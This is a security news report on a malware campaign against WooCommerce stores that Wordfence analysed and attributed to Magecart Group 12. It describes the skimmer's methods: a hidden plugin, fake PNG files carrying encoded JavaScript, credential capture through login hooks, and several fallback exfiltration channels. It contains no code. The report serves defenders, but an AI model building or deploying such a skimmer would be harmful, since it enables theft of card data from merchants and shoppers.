A sophisticated malware campaign has emerged, specifically targeting WordPress e-commerce sites that utilize the WooCommerce plugin for processing customer transactions.
This threat was uncovered in August 2025 and showcases advanced evasion techniques, coupled with a multi-layered approach to credit card data harvesting designed to elude traditional security measures.
The malware masquerades as a rogue WordPress plugin, incorporating custom encryption methods, deceptive image files that hide its malicious payload, and a resilient backdoor framework that permits attackers to deploy additional code at will.
Installation necessitates administrator-level privileges, which are typically secured through compromised credentials or vulnerable plugins.
Once activated, the malware operates stealthily, concealed from the WordPress plugin directory, thereby reducing detection chances while establishing tracking cookies and meticulously logging administrator activities across the compromised site.
Analysts from Wordfence identified and cataloged this malware after receiving a comprehensive sample on August 21, 2025.
Four detection signatures were developed and disseminated to Wordfence Premium, Care, and Response customers between August 27 and September 9, 2025; free users received these signatures after the customary 30-day delay.
This threat poses a substantial risk to online merchants and their clientele, as the malware systematically captures and exfiltrates sensitive payment information.
Advanced Persistence and Command-and-Control Infrastructure
The malware exhibits resilience through a complex array of redundancy layers. It captures WordPress user credentials during login by employing the wp_authenticate_user filter and wp_login action hooks, exfiltrating this data to servers under the attacker’s control.
The payload injection mechanism is executed via deceptive PNG image files that harbor reversed and encoded JavaScript, distributed across three discrete files: a custom payload updated through an AJAX backdoor, a dynamic payload refreshed daily, and a fallback static replica.
The JavaScript skimmer is activated on WooCommerce checkout pages, using a three-second delay to circumvent form conflicts. It attaches event listeners to capture card numbers, expiration dates, and CVV values, which are then transmitted back through AJAX POST requests.
The PHP exfiltration module employs multiple fallback solutions, including native cURL, file_get_contents, system shell curl, and email dispatch, ensuring that data can reach the attackers across various server environments.
The analysis links this malware to Magecart Group 12, substantiated by the SMILODON identifier found within command-and-control server URLs and coding patterns that align with previous activities of the threat actors.
This campaign highlights the persistent threats faced by WordPress e-commerce platforms, underlining the critical necessity for maintaining updated security protocols and vigilant monitoring systems.
Source link: Cybersecuritynews.com.
